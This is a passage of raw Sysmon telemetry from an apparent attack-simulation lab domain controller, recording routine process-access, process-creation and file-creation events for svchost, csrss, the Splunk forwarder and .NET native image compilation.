Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.772{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000008915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.756{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a0-0\UIAutomationTypes.dll2021-01-18 13:51:44.756 10341000x80000000000000008914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.553{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.537{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.537{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AB04-00000000A301}4768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.490{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.475{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.475{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AA04-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:44.428{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd4-0\UIAutomationProvider.dll2021-01-18 13:51:44.428 10341000x80000000000000008907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.349{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.334{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.334{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-A904-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.287{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.287{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-A804-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\F